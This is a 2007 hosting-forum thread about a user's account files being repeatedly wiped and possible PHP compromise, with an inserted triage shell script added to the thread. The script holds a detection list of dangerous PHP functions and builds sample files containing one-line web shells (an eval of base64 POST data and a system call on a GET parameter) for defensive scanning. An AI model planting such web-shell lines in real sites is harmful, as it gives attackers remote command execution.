

Files keep getting wiped out

Started by deltha, October 16, 2007, 01:51:49 PM



deltha

In the last 10 days or so my files (all of them, including public_html folders) have been wiped out. At first I thought it might be a phpBB security issue, so I uploaded a static version of my site (just HTML files, without phpBB) and changed all my passwords (main and MySQL). And today again all the files have been wiped out... Do you know what's going on? :(

Xepher

#1
That is highly bizarre. The SSH logs show only one IP logging in with your username in the past week, and it's from astral.ro. I'm going to guess that's actually you. FTP has no login attempts for your username. That leaves the issue being with something already in your account, such as a compromised forum installation. You say you've uploaded a static site, but there's a forum installed with a lot of php files there. Any one of those could be compromised and I have no easy way to tell. You'd pretty much have to look through the files by hand to see if there was some hack in there. It could just be some really rare glitch that, for example, removes all your files when it was trying to remove an unused avatar image or something. I was going to set up a file watch on your directory that'll notify me of any changes and what time the changes happened, but the kernel isn't compiled with the inotify option, and I'm not rebooting the system just to add it. Sorry. I'll try and keep an eye on your account though. Lemme know if anything else happens.

deltha

#2
I added the SMF after I posted the topic. That IP is my IP and I am the only one who has access to that computer. Is there a script to initialize the user home directory or something? Or squirrelmail trying to do something? 'Cause I've noticed some problems with squirrelmail just before this happened. Maybe they are related :). Thanks!

Xepher

Only thing that should touch home directories is if you run the "fix permissions" tool, and that only calls chmod... no chance of removing anything at all. Squirrelmail runs entirely separate from your account, and connects only to the IMAP server for mail. All its scripts/settings are stored/run from the main website, under the webroot user. It wouldn't have permission to delete files you own even if it tried to. No, it would have to be something running as your user. The prime suspect is still a .php file that got exploited, which is quite likely if you were running phpBB. Now that you've moved to different files and a new forum, lemme know if it happens again. I'm betting someone did gain access to your account, then deleted everything to cover their tracks. Hopefully it's taken care of with phpBB gone and your passwords changed.

deltha

The second 'wipe-out' happened after I had uploaded a new public_html with only static content and changed all the passwords. So it's really weird. After that I created this topic and uploaded a new version (with SMF). Seems to be okay. I still think maybe it's squirrelmail. The script runs with user credentials and is able to create mail folders. Maybe there is an issue there. However, I've switched to Thunderbird and I'll try to avoid squirrelmail in the future just to be sure :D. Let's hope it doesn't happen again, although now I'm prepared with a backup :D. Thanks for your help!

Xepher

Squirrelmail does NOT run with user credentials. It runs as user/group webroot/webroot. It accesses the IMAP server in exactly the same way as Thunderbird would, and THAT process (IMAPd) can create/delete mail folders and such. I suppose it's possible that it deleted your stuff, but no one else has reported any such problem, including me, and I use IMAP pretty much 24/7. Maybe some bizarrely formatted email managed to break things or something, or maybe it's a combination of squirrelmail misprocessing an email and causing some bizarre "delete everything" command to be sent through to the IMAP server. I'd have to think the odds of that are amazingly slim... especially since it happened twice to you. Because if it's something so direct... if you've got a backup, I'd suggest going into squirrelmail intentionally and trying to MAKE it happen again. If it does, then we know where the problem is for sure, and can stop worrying about other possibilities/attacks. Otherwise, my bet is still on some attack. Maybe the first attack left some backdoor daemon running, and the attacker was still "in" the system and wiped stuff a second time when he finished.

deltha

Yeah you're right... sorry. I had to blame something :D. I'll try to reproduce it tomorrow and I'll let you know if something happens :).

Databits

Have you bothered to check your bash history and such? Grep your php files for functions like unlink(), curl(), etc... ?
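An added example of the triage Databits suggests (this is not code from the thread, the host or SMF): a POSIX shell script that greps a PHP tree for the functions a backdoor or a buggy cleanup script would call, and lists files modified after a reference file such as the uploaded site archive. The sample public_html, the list in SUSPECT_FUNCS and the site.zip timestamp are all constructed for the example.

```shell
#!/bin/sh
# Added example, not code from the thread: first-pass triage of a PHP site for
# (a) calls a backdoor or a careless cleanup script would use and
# (b) files modified after a known-good upload. Sample files are constructed.

# PHP functions worth reading by hand when they turn up in a "static" site:
# file removal, command execution, eval-style loaders, outbound connections.
SUSPECT_FUNCS='unlink|rmdir|exec|system|passthru|shell_exec|popen|proc_open|eval|assert|create_function|base64_decode|gzinflate|str_rot13|curl_exec|fsockopen'

# scan_php_dir DIR: print file:line:text for each suspect call in *.php files.
# The leading group rejects e.g. "my_exec(" so only bare function names match.
scan_php_dir() {
    find "$1" -type f -name '*.php' -print0 |
        xargs -0 -r grep -HniE "(^|[^A-Za-z0-9_])(${SUSPECT_FUNCS})[[:space:]]*\(" 2>/dev/null
    return 0
}

# count_suspect_files DIR: number of distinct *.php files with at least one hit.
count_suspect_files() {
    scan_php_dir "$1" | cut -d: -f1 | sort -u | wc -l | tr -d ' '
}

# changed_since DIR REF: files under DIR modified more recently than REF
# (e.g. the site.zip you unpacked). Anything listed was not put there by you.
changed_since() {
    find "$1" -type f -newer "$2" | sort
}

# --- constructed sample site (stands in for ~/public_html) -------------------
SAMPLE=$(mktemp -d)
mkdir -p "$SAMPLE/public_html/images"
cat > "$SAMPLE/public_html/index.php" <<'EOF'
<?php echo "<h1>Welcome</h1>"; ?>
EOF
cat > "$SAMPLE/public_html/cleanup.php" <<'EOF'
<?php
// avatar cleanup that calls unlink() on a path built from user input
$f = $_GET['avatar'];
unlink("images/" . $f);
EOF
cat > "$SAMPLE/public_html/images/thumb.php" <<'EOF'
<?php eval(base64_decode($_POST['c'])); ?>
EOF
# Pretend the archive and everything in it were unpacked on 2007-10-16.
touch -t 200710160000 "$SAMPLE/site.zip"
find "$SAMPLE/public_html" -exec touch -t 200710160000 {} +
# A file dropped later by someone else (hidden name, not in the upload).
echo '<?php system($_GET["cmd"]); ?>' > "$SAMPLE/public_html/images/.cache.php"

echo "== suspect calls =="
scan_php_dir "$SAMPLE/public_html"
echo "== files changed since the upload =="
changed_since "$SAMPLE/public_html" "$SAMPLE/site.zip"
```

Against a real account this would be `scan_php_dir ~/public_html` and `changed_since ~/public_html ~/site.zip`. A grep hit is a file to read, not proof of compromise: a forum package legitimately calls unlink() when it removes an attachment or avatar. The timestamp check has the opposite caveat: whoever wiped .bash_history can just as easily touch mtimes, so an empty changed_since listing is not proof that nothing was added.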

Xepher

The .bash_history file was actually wiped out too. I looked at it; it had all of 3 lines in it, unzipping "site.zip" (or some such) when he restored it. I didn't check the PHP, as it's a new SMF install, so it was kinda pointless.